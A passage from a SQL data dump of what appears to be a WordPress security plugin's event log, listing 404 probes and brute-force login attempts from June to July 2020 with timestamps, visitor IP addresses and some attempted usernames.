00:15:37','216.10.247.126',NULL,NULL),(68382,'four_oh_four','2020-06-27 19:28:38','2020-06-28 00:28:38','193.106.30.99',NULL,NULL),(68383,'four_oh_four','2020-06-27 20:18:05','2020-06-28 01:18:05','66.249.69.149',NULL,NULL),(68384,'four_oh_four','2020-06-27 20:49:03','2020-06-28 01:49:03','194.61.24.94',NULL,NULL),(68385,'brute_force','2020-06-27 22:13:15','2020-06-28 03:13:15','61.47.2.163',NULL,NULL),(68386,'brute_force','2020-06-27 22:13:15','2020-06-28 03:13:15',NULL,NULL,'zphiblgz'),(68387,'four_oh_four','2020-06-28 02:12:05','2020-06-28 07:12:05','40.77.167.150',NULL,NULL),(68388,'four_oh_four','2020-06-28 06:16:42','2020-06-28 11:16:42','107.172.229.157',NULL,NULL),(68389,'brute_force','2020-06-28 12:52:44','2020-06-28 17:52:44','162.215.249.25',NULL,NULL),(68390,'brute_force','2020-06-28 12:52:44','2020-06-28 17:52:44',NULL,NULL,'admin'),(68391,'four_oh_four','2020-06-28 13:01:08','2020-06-28 18:01:08','51.83.216.204',NULL,NULL),(68392,'four_oh_four','2020-06-28 13:01:11','2020-06-28 18:01:11','51.83.216.204',NULL,NULL),(68393,'four_oh_four','2020-06-28 13:32:07','2020-06-28 18:32:07','3.94.137.21',NULL,NULL),(68394,'four_oh_four','2020-06-28 13:32:08','2020-06-28 18:32:08','3.94.137.21',NULL,NULL),(68395,'four_oh_four','2020-06-28 13:32:10','2020-06-28 18:32:10','3.94.137.21',NULL,NULL),(68396,'four_oh_four','2020-06-28 13:32:11','2020-06-28 18:32:11','3.94.137.21',NULL,NULL),(68397,'four_oh_four','2020-06-28 13:32:13','2020-06-28 18:32:13','52.201.182.91',NULL,NULL),(68398,'four_oh_four','2020-06-28 13:32:14','2020-06-28 18:32:14','52.201.182.91',NULL,NULL),(68399,'four_oh_four','2020-06-28 14:02:00','2020-06-28 19:02:00','184.154.139.3',NULL,NULL),(68400,'four_oh_four','2020-06-28 16:35:36','2020-06-28 21:35:36','77.88.5.178',NULL,NULL),(68401,'four_oh_four','2020-06-28 17:53:50','2020-06-28 22:53:50','66.60.182.68',NULL,NULL),(68402,'four_oh_four','2020-06-28 18:35:15','2020-06-28 23:35:15','194.61.24.94',NULL,NULL),(68403,'four_oh_four','2020-06-28 19:26:03','2020-06-29 00:26:03','66.249.69.149',NULL,NULL),(68404,'four_oh_four','2020-06-28 21:01:57','2020-06-29 02:01:57','66.249.69.158',NULL,NULL),(68405,'four_oh_four','2020-06-28 23:21:01','2020-06-29 04:21:01','185.143.229.222',NULL,NULL),(68406,'four_oh_four','2020-06-28 23:21:08','2020-06-29 04:21:08','185.143.229.222',NULL,NULL),(68407,'four_oh_four','2020-06-29 03:08:02','2020-06-29 08:08:02','104.219.248.110',NULL,NULL),(68408,'four_oh_four','2020-06-29 04:58:05','2020-06-29 09:58:05','199.66.201.19',NULL,NULL),(68409,'four_oh_four','2020-06-29 04:58:05','2020-06-29 09:58:05','199.66.201.19',NULL,NULL),(68410,'four_oh_four','2020-06-29 05:04:00','2020-06-29 10:04:00','207.46.13.42',NULL,NULL),(68411,'four_oh_four','2020-06-29 05:20:36','2020-06-29 10:20:36','40.77.167.150',NULL,NULL),(68412,'four_oh_four','2020-06-29 08:30:09','2020-06-29 13:30:09','119.235.248.132',NULL,NULL),(68413,'four_oh_four','2020-06-29 08:30:09','2020-06-29 13:30:09','119.235.248.132',NULL,NULL),(68414,'four_oh_four','2020-06-29 09:31:43','2020-06-29 14:31:43','40.77.167.150',NULL,NULL),(68415,'four_oh_four','2020-06-29 09:35:41','2020-06-29 14:35:41','207.46.13.42',NULL,NULL),(68416,'four_oh_four','2020-06-29 13:37:10','2020-06-29 18:37:10','3.94.137.21',NULL,NULL),(68417,'four_oh_four','2020-06-29 13:37:10','2020-06-29 18:37:10','52.201.182.91',NULL,NULL),(68418,'four_oh_four','2020-06-29 13:37:13','2020-06-29 18:37:13','3.94.137.21',NULL,NULL),(68419,'four_oh_four','2020-06-29 13:37:13','2020-06-29 18:37:13','52.201.182.91',NULL,NULL),(68420,'four_oh_four','2020-06-29 13:37:14','2020-06-29 18:37:14','52.201.182.91',NULL,NULL),(68421,'four_oh_four','2020-06-29 13:37:15','2020-06-29 18:37:15','52.201.182.91',NULL,NULL),(68422,'four_oh_four','2020-06-29 14:07:40','2020-06-29 19:07:40','184.154.139.17',NULL,NULL),(68423,'four_oh_four','2020-06-29 16:43:52','2020-06-29 21:43:52','194.61.24.94',NULL,NULL),(68424,'four_oh_four','2020-06-29 17:03:19','2020-06-29 22:03:19','107.172.81.127',NULL,NULL),(68425,'four_oh_four','2020-06-29 17:24:50','2020-06-29 22:24:50','40.77.167.150',NULL,NULL),(68426,'four_oh_four','2020-06-29 23:37:00','2020-06-30 04:37:00','40.77.167.150',NULL,NULL),(68427,'four_oh_four','2020-06-30 00:20:34','2020-06-30 05:20:34','207.46.13.42',NULL,NULL),(68428,'brute_force','2020-06-30 00:53:53','2020-06-30 05:53:53','109.234.162.14',NULL,NULL),(68429,'brute_force','2020-06-30 00:53:53','2020-06-30 05:53:53',NULL,NULL,'admin'),(68430,'four_oh_four','2020-06-30 04:40:03','2020-06-30 09:40:03','40.77.167.150',NULL,NULL),(68431,'four_oh_four','2020-06-30 06:27:37','2020-06-30 11:27:37','80.92.224.10',NULL,NULL),(68432,'four_oh_four','2020-06-30 06:27:37','2020-06-30 11:27:37','80.92.224.10',NULL,NULL),(68433,'four_oh_four','2020-06-30 06:27:38','2020-06-30 11:27:38','80.92.224.10',NULL,NULL),(68434,'brute_force','2020-06-30 12:30:52','2020-06-30 17:30:52','184.168.27.99',NULL,NULL),(68435,'brute_force','2020-06-30 12:30:52','2020-06-30 17:30:52',NULL,NULL,'admin'),(68436,'four_oh_four','2020-06-30 13:42:00','2020-06-30 18:42:00','52.201.182.91',NULL,NULL),(68437,'four_oh_four','2020-06-30 13:42:02','2020-06-30 18:42:02','52.201.182.91',NULL,NULL),(68438,'four_oh_four','2020-06-30 13:42:04','2020-06-30 18:42:04','52.201.182.91',NULL,NULL),(68439,'four_oh_four','2020-06-30 13:42:05','2020-06-30 18:42:05','52.201.182.91',NULL,NULL),(68440,'four_oh_four','2020-06-30 13:42:07','2020-06-30 18:42:07','52.201.182.91',NULL,NULL),(68441,'four_oh_four','2020-06-30 13:42:08','2020-06-30 18:42:08','52.201.182.91',NULL,NULL),(68442,'four_oh_four','2020-06-30 14:02:20','2020-06-30 19:02:20','184.154.139.3',NULL,NULL),(68443,'four_oh_four','2020-06-30 14:34:59','2020-06-30 19:34:59','194.61.24.94',NULL,NULL),(68444,'four_oh_four','2020-06-30 16:17:58','2020-06-30 21:17:58','153.122.170.30',NULL,NULL),(68445,'four_oh_four','2020-06-30 22:29:38','2020-07-01 03:29:38','40.77.167.85',NULL,NULL),(68446,'four_oh_four','2020-07-01 06:04:23','2020-07-01 11:04:23','39.98.124.123',NULL,NULL),(68447,'four_oh_four','2020-07-01 07:06:11','2020-07-01 12:06:11','34.89.215.42',NULL,NULL),(68448,'four_oh_four','2020-07-01 07:06:19','2020-07-01 12:06:19','34.89.215.42',NULL,NULL),(68449,'four_oh_four','2020-07-01 12:12:33','2020-07-01 17:12:33','194.61.24.94',NULL,NULL),(68450,'four_oh_four','2020-07-01 13:47:25','2020-07-01 18:47:25','3.94.137.21',NULL,NULL),(68451,'four_oh_four','2020-07-01 13:47:25','2020-07-01 18:47:25','52.201.182.91',NULL,NULL),(68452,'four_oh_four','2020-07-01 13:47:27','2020-07-01 18:47:27','3.94.137.21',NULL,NULL),(68453,'four_oh_four','2020-07-01 13:47:28','2020-07-01 18:47:28','52.201.182.91',NULL,NULL),(68454,'four_oh_four','2020-07-01 13:47:31','2020-07-01 18:47:31','3.94.137.21',NULL,NULL),(68455,'four_oh_four','2020-07-01 13:47:32','2020-07-01 18:47:32','3.94.137.21',NULL,NULL),(68456,'four_oh_four','2020-07-01 14:08:02','2020-07-01 19:08:02','184.154.139.21',NULL,NULL),(68457,'four_oh_four','2020-07-01 14:43:40','2020-07-01 19:43:40','5.188.62.25',NULL,NULL),(68458,'four_oh_four','2020-07-01 14:43:42','2020-07-01 19:43:42','5.188.62.25',NULL,NULL),(68459,'four_oh_four','2020-07-01 14:43:44','2020-07-01 19:43:44','5.188.62.25',NULL,NULL),(68460,'four_oh_four','2020-07-01 14:43:46','2020-07-01 19:43:46','5.188.62.25',NULL,NULL),(68461,'four_oh_four','2020-07-01 14:43:49','2020-07-01 19:43:49','5.188.62.25',NULL,NULL),(68462,'brute_force','2020-07-02 01:01:31','2020-07-02 06:01:31','109.239.227.89',NULL,NULL),(68463,'brute_force','2020-07-02 01:01:31','2020-07-02 06:01:31',NULL,NULL,'admin'),(68464,'four_oh_four','2020-07-02 08:12:16','2020-07-02 13:12:16','193.106.30.99',NULL,NULL),(68465,'four_oh_four','2020-07-02 08:30:26','2020-07-02 13:30:26','207.46.13.143',NULL,NULL),(68466,'four_oh_four','2020-07-02 09:33:29','2020-07-02 14:33:29','194.61.24.94',NULL,NULL),(68467,'four_oh_four','2020-07-02 13:55:00','2020-07-02 18:55:00','52.201.182.91',NULL,NULL),(68468,'four_oh_four','2020-07-02 13:55:01','2020-07-02 18:55:01','52.201.182.91',NULL,NULL),(68469,'four_oh_four','2020-07-02 13:55:03','2020-07-02 18:55:03','52.201.182.91',NULL,NULL),(68470,'four_oh_four','2020-07-02 13:55:04','2020-07-02 18:55:04','52.201.182.91',NULL,NULL),(68471,'four_oh_four','2020-07-02 13:55:07','2020-07-02 18:55:07','3.94.137.21',NULL,NULL),(68472,'four_oh_four','2020-07-02 13:55:08','2020-07-02 18:55:08','3.94.137.21',NULL,NULL),(68473,'four_oh_four','2020-07-02 14:13:39','2020-07-02 19:13:39','184.154.139.18',NULL,NULL),(68474,'four_oh_four','2020-07-02 18:13:03','2020-07-02 23:13:03','207.46.13.106',NULL,NULL),(68475,'four_oh_four','2020-07-03 00:48:56','2020-07-03 05:48:56','193.106.30.99',NULL,NULL),(68476,'four_oh_four','2020-07-03 07:11:21','2020-07-03 12:11:21','194.61.24.94',NULL,NULL),(68477,'four_oh_four','2020-07-03 09:12:59','2020-07-03 14:12:59','40.77.167.155',NULL,NULL),(68478,'four_oh_four','2020-07-03 10:55:25','2020-07-03 15:55:25','193.106.30.99',NULL,NULL),(68479,'brute_force','2020-07-03 12:05:08','2020-07-03 17:05:08','50.63.197.54',NULL,NULL),(68480,'brute_force','2020-07-03 12:05:08','2020-07-03 17:05:08',NULL,NULL,'admin'),(68481,'four_oh_four','2020-07-03 12:59:40','2020-07-03 17:59:40','34.70.141.51',NULL,NULL),(68482,'four_oh_four','2020-07-03 12:59:41','2020-07-03 17:59:41','34.70.141.51',NULL,NULL),(68483,'four_oh_four','2020-07-03 12:59:43','2020-07-03 17:59:43','34.70.141.51',NULL,NULL),(68484,'four_oh_four','2020-07-03 12:59:44','2020-07-03 17:59:44','34.70.141.51',NULL,NULL),(68485,'four_oh_four','2020-07-03 12:59:45','2020-07-03 17:59:45','34.70.141.51',NULL,NULL),(68486,'four_oh_four','2020-07-03 12:59:47','2020-07-03 17:59:47','34.70.141.51',NULL,NULL),(68487,'four_oh_four','2020-07-03 12:59:48','2020-07-03 17:59:48','34.70.141.51',NULL,NULL),(68488,'four_oh_four','2020-07-03 12:59:49','2020-07-03 17:59:49','34.70.141.51',NULL,NULL),(68489,'four_oh_four','2020-07-03 12:59:51','2020-07-03 17:59:51','34.70.141.51',NULL,NULL),(68490,'four_oh_four','2020-07-03 12:59:52','2020-07-03 17:59:52','34.70.141.51',NULL,NULL),(68491,'four_oh_four','2020-07-03 12:59:53','2020-07-03 17:59:53','34.70.141.51',NULL,NULL),(68492,'four_oh_four','2020-07-03 12:59:55','2020-07-03 17:59:55','34.70.141.51',NULL,NULL),(68493,'four_oh_four','2020-07-03 12:59:57','2020-07-03 17:59:57','34.70.141.51',NULL,NULL),(68494,'four_oh_four','2020-07-03 12:59:58','2020-07-03 17:59:58','34.70.141.51',NULL,NULL),(68495,'four_oh_four','2020-07-03 13:00:00','2020-07-03 18:00:00','34.70.141.51',NULL,NULL),(68496,'four_oh_four','2020-07-03 13:00:02','2020-07-03 18:00:02','34.70.141.51',NULL,NULL),(68497,'four_oh_four','2020-07-03 13:00:03','2020-07-03 18:00:03','34.70.141.51',NULL,NULL),(68498,'four_oh_four','2020-07-03 13:00:05','2020-07-03 18:00:05','34.70.141.51',NULL,NULL),(68499,'four_oh_four','2020-07-03 13:00:07','2020-07-03 18:00:07','34.70.141.51',NULL,NULL),(68500,'four_oh_four','2020-07-03 13:00:08','2020-07-03 18:00:08','34.70.141.51',NULL,NULL),(68501,'four_oh_four','2020-07-03 14:01:50','2020-07-03 19:01:50','184.154.139.19',NULL,NULL),(68502,'four_oh_four','2020-07-03 14:04:43','2020-07-03 19:04:43','52.201.182.91',NULL,NULL),(68503,'four_oh_four','2020-07-03 14:04:44','2020-07-03 19:04:44','3.94.137.21',NULL,NULL),(68504,'four_oh_four','2020-07-03 14:04:45','2020-07-03 19:04:45','52.201.182.91',NULL,NULL),(68505,'four_oh_four','2020-07-03 14:04:46','2020-07-03 19:04:46','3.94.137.21',NULL,NULL),(68506,'four_oh_four','2020-07-03 14:04:49','2020-07-03 19:04:49','52.201.182.91',NULL,NULL),(68507,'four_oh_four','2020-07-03 14:04:50','2020-07-03 19:04:50','52.201.182.91',NULL,NULL),(68508,'four_oh_four','2020-07-03 16:31:19','2020-07-03 21:31:19','89.46.106.170',NULL,NULL),(68509,'four_oh_four','2020-07-03 20:06:10','2020-07-04 01:06:10','185.208.164.124',NULL,NULL),(68510,'four_oh_four','2020-07-03 20:18:27','2020-07-04 01:18:27','193.106.30.99',NULL,NULL),(68511,'four_oh_four','2020-07-03 20:26:57','2020-07-04 01:26:57','186.223.227.95',NULL,NULL),(68512,'four_oh_four','2020-07-03 20:27:05','2020-07-04 01:27:05','186.223.227.95',NULL,NULL),(68513,'four_oh_four','2020-07-03 20:27:12','2020-07-04 01:27:12','186.223.227.95',NULL,NULL),(68514,'four_oh_four','2020-07-04 00:56:24','2020-07-04 05:56:24','78.46.90.120',NULL,NULL),(68515,'four_oh_four','2020-07-04 04:32:52','2020-07-04 09:32:52','194.61.24.94',NULL,NULL),(68516,'four_oh_four','2020-07-04 07:01:12','2020-07-04 12:01:12','52.96.43.29',NULL,NULL),(68517,'four_oh_four','2020-07-04 07:01:16','2020-07-04 12:01:16','52.125.136.103',NULL,NULL),(68518,'four_oh_four','2020-07-04 07:01:17','2020-07-04 12:01:17','52.125.136.103',NULL,NULL),(68519,'four_oh_four','2020-07-04 07:01:18','2020-07-04 12:01:18','52.125.136.103',NULL,NULL),(68520,'four_oh_four','2020-07-04 11:30:01','2020-07-04 16:30:01','207.46.13.42',NULL,NULL),(68521,'four_oh_four','2020-07-04 14:04:15','2020-07-04 19:04:15','184.154.139.17',NULL,NULL),(68522,'four_oh_four','2020-07-04 14:09:44','2020-07-04 19:09:44','3.94.137.21',NULL,NULL),(68523,'four_oh_four','2020-07-04 14:09:47','2020-07-04 19:09:47','3.94.137.21',NULL,NULL),(68524,'four_oh_four','2020-07-04 14:09:48','2020-07-04 19:09:48','3.94.137.21',NULL,NULL),(68525,'four_oh_four','2020-07-04 14:09:50','2020-07-04 19:09:50','3.94.137.21',NULL,NULL),(68526,'four_oh_four','2020-07-04 14:09:50','2020-07-04 19:09:50','3.94.137.21',NULL,NULL),(68527,'four_oh_four','2020-07-04 14:09:52','2020-07-04 19:09:52','3.94.137.21',NULL,NULL),(68528,'four_oh_four','2020-07-04 16:19:36','2020-07-04 21:19:36','40.77.167.49',NULL,NULL),(68529,'four_oh_four','2020-07-04 20:48:18','2020-07-05 01:48:18','207.46.13.143',NULL,NULL),(68530,'brute_force','2020-07-04 23:01:18','2020-07-05 04:01:18','193.246.38.185',NULL,NULL),(68531,'brute_force','2020-07-04 23:01:18','2020-07-05 04:01:18',NULL,NULL,'admin'),(68532,'four_oh_four','2020-07-05 01:54:00','2020-07-05 06:54:00','194.61.24.94',NULL,NULL),(68533,'four_oh_four','2020-07-05 02:31:22','2020-07-05 07:31:22','157.55.39.42',NULL,NULL),(68534,'four_oh_four','2020-07-05 03:17:43','2020-07-05 08:17:43','176.31.162.200',NULL,NULL),(68535,'four_oh_four','2020-07-05 03:17:45','2020-07-05 08:17:45','176.31.162.200',NULL,NULL),(68536,'four_oh_four','2020-07-05 03:17:47','2020-07-05 08:17:47','176.31.162.200',NULL,NULL),(68537,'four_oh_four','2020-07-05 03:17:48','2020-07-05 08:17:48','176.31.162.200',NULL,NULL),(68538,'four_oh_four','2020-07-05 03:17:49','2020-07-05 08:17:49','176.31.162.200',NULL,NULL),(68539,'four_oh_four','2020-07-05 03:17:50','2020-07-05 08:17:50','176.31.162.200',NULL,NULL),(68540,'four_oh_four','2020-07-05 03:17:52','2020-07-05 08:17:52','176.31.162.200',NULL,NULL),(68541,'four_oh_four','2020-07-05 03:17:53','2020-07-05 08:17:53','176.31.162.200',NULL,NULL),(68542,'four_oh_four','2020-07-05 07:03:17','2020-07-05 12:03:17','31.131.251.113',NULL,NULL),(68543,'four_oh_four','2020-07-05 07:03:20','2020-07-05 12:03:20','31.131.251.113',NULL,NULL),(68544,'four_oh_four','2020-07-05 07:03:22','2020-07-05 12:03:22','31.131.251.113',NULL,NULL),(68545,'four_oh_four','2020-07-05 07:03:25','2020-07-05 12:03:25','31.131.251.113',NULL,NULL),(68546,'four_oh_four','2020-07-05 07:03:27','2020-07-05 12:03:27','31.131.251.113',NULL,NULL),(68547,'four_oh_four','2020-07-05 07:03:29','2020-07-05 12:03:29','31.131.251.113',NULL,NULL),(68548,'four_oh_four','2020-07-05 07:03:30','2020-07-05 12:03:30','31.131.251.113',NULL,NULL),(68549,'four_oh_four','2020-07-05 07:03:32','2020-07-05 12:03:32','31.131.251.113',NULL,NULL),(68550,'four_oh_four','2020-07-05 07:03:34','2020-07-05 12:03:34','31.131.251.113',NULL,NULL),(68551,'four_oh_four','2020-07-05 07:03:36','2020-07-05 12:03:36','31.131.251.113',NULL,NULL),(68552,'four_oh_four','2020-07-05 07:03:38','2020-07-05 12:03:38','31.131.251.113',NULL,NULL),(68553,'four_oh_four','2020-07-05 07:03:40','2020-07-05 12:03:40','31.131.251.113',NULL,NULL),(68554,'four_oh_four','2020-07-05 09:47:15','2020-07-05 14:47:15','207.46.13.42',NULL,NULL),(68555,'four_oh_four','2020-07-05 11:57:19','2020-07-05 16:57:19','157.55.39.42',NULL,NULL),(68556,'four_oh_four','2020-07-05 14:11:47','2020-07-05 19:11:47','184.154.139.17',NULL,NULL),(68557,'four_oh_four','2020-07-05 14:15:28','2020-07-05 19:15:28','52.201.182.91',NULL,NULL),(68558,'four_oh_four','2020-07-05 14:15:29','2020-07-05 19:15:29','3.94.137.21',NULL,NULL),(68559,'four_oh_four','2020-07-05 14:15:30','2020-07-05 19:15:30','52.201.182.91',NULL,NULL),(68560,'four_oh_four','2020-07-05 14:15:31','2020-07-05 19:15:31','3.94.137.21',NULL,NULL),(68561,'four_oh_four','2020-07-05 14:15:35','2020-07-05 19:15:35','3.94.137.21',NULL,NULL),(68562,'four_oh_four','2020-07-05 14:15:36','2020-07-05 19:15:36','3.94.137.21',NULL,NULL),(68563,'four_oh_four','2020-07-05 14:47:15','2020-07-05 19:47:15','207.46.13.42',NULL,NULL),(68564,'four_oh_four','2020-07-05 16:55:20','2020-07-05 21:55:20','39.98.124.123',NULL,NULL),(68565,'four_oh_four','2020-07-05 17:51:50','2020-07-05 22:51:50','192.186.168.236',NULL,NULL),(68566,'four_oh_four','2020-07-05 19:05:53','2020-07-06 00:05:53','190.107.177.38',NULL,NULL),(68567,'four_oh_four','2020-07-05 19:05:57','2020-07-06 00:05:57','190.107.177.38',NULL,NULL),(68568,'four_oh_four','2020-07-05 23:10:34','2020-07-06 04:10:34','194.61.24.94',NULL,NULL),(68569,'four_oh_four','2020-07-06 01:19:45','2020-07-06 06:19:45','162.243.29.24',NULL,NULL),(68570,'four_oh_four','2020-07-06 06:20:52','2020-07-06 11:20:52','104.227.97.122',NULL,NULL),(68571,'brute_force','2020-07-06 09:24:25','2020-07-06 14:24:25','192.161.86.162',NULL,NULL),(68572,'brute_force','2020-07-06 09:24:25','2020-07-06 14:24:25',NULL,NULL,'admin'),(68573,'four_oh_four','2020-07-06 09:30:37','2020-07-06 14:30:37','162.243.29.24',NULL,NULL),(68574,'four_oh_four','2020-07-06 10:20:17','2020-07-06 15:20:17','162.243.126.96',NULL,NULL),(68575,'four_oh_four','2020-07-06 12:18:33','2020-07-06 17:18:33','207.46.13.42',NULL,NULL),(68576,'four_oh_four','2020-07-06 14:09:20','2020-07-06 19:09:20','184.154.139.3',NULL,NULL),(68577,'four_oh_four','2020-07-06 14:20:31','2020-07-06 19:20:31','3.94.137.21',NULL,NULL),(68578,'four_oh_four','2020-07-06 14:20:32','2020-07-06 19:20:32','52.201.182.91',NULL,NULL),(68579,'four_oh_four','2020-07-06 14:20:34','2020-07-06 19:20:34','3.94.137.21',NULL,NULL),(68580,'four_oh_four','2020-07-06 14:20:35','2020-07-06 19:20:35','52.201.182.91',NULL,NULL),(68581,'four_oh_four','2020-07-06 14:20:38','2020-07-06 19:20:38','52.201.182.91',NULL,NULL),(68582,'four_oh_four','2020-07-06 14:20:39','2020-07-06 19:20:39','52.201.182.91',NULL,NULL),(68583,'four_oh_four','2020-07-06 20:28:55','2020-07-07 01:28:55','194.61.24.94',NULL,NULL),(68584,'four_oh_four','2020-07-06 20:41:34','2020-07-07 01:41:34','193.106.30.99',NULL,NULL),(68585,'four_oh_four','2020-07-06 20:43:55','2020-07-07 01:43:55','162.241.216.77',NULL,NULL),(68586,'four_oh_four','2020-07-06 21:05:49','2020-07-07 02:05:49','35.225.8.194',NULL,NULL),(68587,'four_oh_four','2020-07-06 21:05:51','2020-07-07 02:05:51','35.225.8.194',NULL,NULL),(68588,'four_oh_four','2020-07-06 21:05:52','2020-07-07 02:05:52','35.225.8.194',NULL,NULL),(68589,'four_oh_four','2020-07-06 21:05:54','2020-07-07 02:05:54','35.225.8.194',NULL,NULL),(68590,'four_oh_four','2020-07-06 21:05:55','2020-07-07 02:05:55','35.225.8.194',NULL,NULL),(68591,'four_oh_four','2020-07-06 21:05:56','2020-07-07 02:05:56','35.225.8.194',NULL,NULL),(68592,'four_oh_four','2020-07-06 21:05:57','2020-07-07 02:05:57','35.225.8.194',NULL,NULL),(68593,'four_oh_four','2020-07-06 21:05:59','2020-07-07 02:05:59','35.225.8.194',NULL,NULL),(68594,'four_oh_four','2020-07-06 21:06:00','2020-07-07 02:06:00','35.225.8.194',NULL,NULL),(68595,'four_oh_four','2020-07-06 21:06:01','2020-07-07 02:06:01','35.225.8.194',NULL,NULL),(68596,'four_oh_four','2020-07-06 21:06:05','2020-07-07 02:06:05','35.225.8.194',NULL,NULL),(68597,'four_oh_four','2020-07-06 21:06:07','2020-07-07 02:06:07','35.225.8.194',NULL,NULL),(68598,'four_oh_four','2020-07-06 21:06:08','2020-07-07 02:06:08','35.225.8.194',NULL,NULL),(68599,'four_oh_four','2020-07-06 21:06:09','2020-07-07 02:06:09','35.225.8.194',NULL,NULL),(68600,'four_oh_four','2020-07-06 21:06:11','2020-07-07 02:06:11','35.225.8.194',NULL,NULL),(68601,'four_oh_four','2020-07-06 21:06:12','2020-07-07 02:06:12','35.225.8.194',NULL,NULL),(68602,'four_oh_four','2020-07-06 21:06:13','2020-07-07 02:06:13','35.225.8.194',NULL,NULL),(68603,'four_oh_four','2020-07-06 21:06:14','2020-07-07 02:06:14','35.225.8.194',NULL,NULL),(68604,'four_oh_four','2020-07-06 21:06:16','2020-07-07 02:06:16','35.225.8.194',NULL,NULL),(68605,'four_oh_four','2020-07-06 21:06:17','2020-07-07 02:06:17','35.225.8.194',NULL,NULL),(68606,'four_oh_four','2020-07-07 01:45:29','2020-07-07 06:45:29','193.106.30.99',NULL,NULL),(68607,'four_oh_four','2020-07-07 06:38:50','2020-07-07 11:38:50','47.113.87.53',NULL,NULL),(68608,'four_oh_four','2020-07-07 10:21:28','2020-07-07 15:21:28','193.106.30.99',NULL,NULL),(68609,'four_oh_four','2020-07-07 14:05:47','2020-07-07 19:05:47','184.154.139.17',NULL,NULL),(68610,'four_oh_four','2020-07-07 14:06:14','2020-07-07 19:06:14','184.154.139.17',NULL,NULL),(68611,'four_oh_four','2020-07-07 14:25:37','2020-07-07 19:25:37','52.201.182.91',NULL,NULL),(68612,'four_oh_four','2020-07-07 14:25:38','2020-07-07 19:25:38','52.201.182.91',NULL,NULL),(68613,'four_oh_four','2020-07-07 17:13:14','2020-07-07 22:13:14','66.249.75.173',NULL,NULL),(68614,'four_oh_four','2020-07-07 17:23:49','2020-07-07 22:23:49','178.93.60.103',NULL,NULL),(68615,'four_oh_four','2020-07-07 17:23:51','2020-07-07 22:23:51','178.93.60.103',NULL,NULL),(68616,'four_oh_four','2020-07-07 18:06:22','2020-07-07 23:06:22','194.61.24.94',NULL,NULL),(68617,'four_oh_four','2020-07-07 19:49:48','2020-07-08 00:49:48','193.106.30.99',NULL,NULL),(68618,'brute_force','2020-07-07 20:29:58','2020-07-08 01:29:58','198.71.227.32',NULL,NULL),(68619,'brute_force','2020-07-07 20:29:58','2020-07-08 01:29:58',NULL,NULL,'admin'),(68620,'four_oh_four','2020-07-07 20:45:16','2020-07-08 01:45:16','173.69.150.59',NULL,NULL),(68621,'four_oh_four','2020-07-07 21:07:53','2020-07-08 02:07:53','66.249.69.156',NULL,NULL),(68622,'four_oh_four','2020-07-08 14:10:47','2020-07-08 19:10:47','184.154.139.17',NULL,NULL),(68623,'four_oh_four','2020-07-08 14:30:31','2020-07-08 19:30:31','52.201.182.91',NULL,NULL),(68624,'four_oh_four','2020-07-08 14:30:33','2020-07-08 19:30:33','52.201.182.91',NULL,NULL),(68625,'four_oh_four','2020-07-08 14:30:38','2020-07-08 19:30:38','52.201.182.91',NULL,NULL),(68626,'four_oh_four','2020-07-08 14:30:39','2020-07-08 19:30:39','52.201.182.91',NULL,NULL),(68627,'four_oh_four','2020-07-08 15:16:25','2020-07-08 20:16:25','194.61.24.94',NULL,NULL),(68628,'four_oh_four','2020-07-08 17:16:21','2020-07-08 22:16:21','38.128.157.114',NULL,NULL),(68629,'brute_force','2020-07-08 21:46:28','2020-07-09 02:46:28','68.134.121.122',NULL,NULL),(68630,'brute_force','2020-07-08 21:46:28','2020-07-09 02:46:28',NULL,NULL,'linda'),(68631,'four_oh_four','2020-07-08 23:18:27','2020-07-09 04:18:27','216.173.66.65',NULL,NULL),(68632,'four_oh_four','2020-07-08 23:27:31','2020-07-09 04:27:31','207.46.13.35',NULL,NULL),(68633,'four_oh_four','2020-07-09 03:28:59','2020-07-09 08:28:59','36.89.66.180',NULL,NULL),(68634,'four_oh_four','2020-07-09 12:08:49','2020-07-09 17:08:49','194.61.24.94',NULL,NULL),(68635,'four_oh_four','2020-07-09 13:39:11','2020-07-09 18:39:11','108.22.254.28',NULL,NULL),(68636,'four_oh_four','2020-07-09 14:08:08','2020-07-09 19:08:08','184.154.139.18',NULL,NULL),(68637,'four_oh_four','2020-07-09 14:08:31','2020-07-09 19:08:31','184.154.139.18',NULL,NULL),(68638,'four_oh_four','2020-07-09 14:35:58','2020-07-09 19:35:58','52.201.182.91',NULL,NULL),(68639,'four_oh_four','2020-07-09 14:35:59','2020-07-09 19:35:59','52.201.182.91',NULL,NULL),(68640,'four_oh_four','2020-07-09 14:36:00','2020-07-09 19:36:00','52.201.182.91',NULL,NULL),(68641,'four_oh_four','2020-07-09 14:36:02','2020-07-09 19:36:02','52.201.182.91',NULL,NULL),(68642,'four_oh_four','2020-07-09 16:46:46','2020-07-09 21:46:46','66.249.65.156',NULL,NULL),(68643,'four_oh_four','2020-07-10 00:47:25','2020-07-10 05:47:25','185.43.222.154',NULL,NULL),(68644,'four_oh_four','2020-07-10 00:48:36','2020-07-10 05:48:36','45.57.236.202',NULL,NULL),(68645,'four_oh_four','2020-07-10 07:16:05','2020-07-10 12:16:05','194.61.24.94',NULL,NULL),(68646,'four_oh_four','2020-07-10 14:07:05','2020-07-10 19:07:05','184.154.139.18',NULL,NULL),(68647,'four_oh_four','2020-07-10 14:07:26','2020-07-10 19:07:26','184.154.139.18',NULL,NULL),(68648,'four_oh_four','2020-07-10 14:40:27','2020-07-10 19:40:27','52.201.182.91',NULL,NULL),(68649,'four_oh_four','2020-07-10 14:40:30','2020-07-10 19:40:30','52.201.182.91',NULL,NULL),(68650,'four_oh_four','2020-07-10 14:40:34','2020-07-10 19:40:34','3.94.137.21',NULL,NULL),(68651,'four_oh_four','2020-07-10 14:40:35','2020-07-10 19:40:35','3.94.137.21',NULL,NULL),(68652,'four_oh_four','2020-07-11 03:53:58','2020-07-11 08:53:58','95.163.255.29',NULL,NULL),(68653,'four_oh_four','2020-07-11 04:22:20','2020-07-11 09:22:20','194.61.24.94',NULL,NULL),(68654,'four_oh_four','2020-07-11 12:38:49','2020-07-11 17:38:49','144.91.100.233',NULL,NULL),(68655,'four_oh_four','2020-07-11 14:05:26','2020-07-11 19:05:26','184.154.139.20',NULL,NULL),(68656,'four_oh_four','2020-07-11 14:45:34','2020-07-11 19:45:34','52.201.182.91',NULL,NULL),(68657,'four_oh_four','2020-07-11 14:45:37','2020-07-11 19:45:37','52.201.182.91',NULL,NULL),(68658,'four_oh_four','2020-07-11 14:45:40','2020-07-11 19:45:40','3.94.137.21',NULL,NULL),(68659,'four_oh_four','2020-07-11 14:45:42','2020-07-11 19:45:42','3.94.137.21',NULL,NULL),(68660,'four_oh_four','2020-07-11 20:15:44','2020-07-12 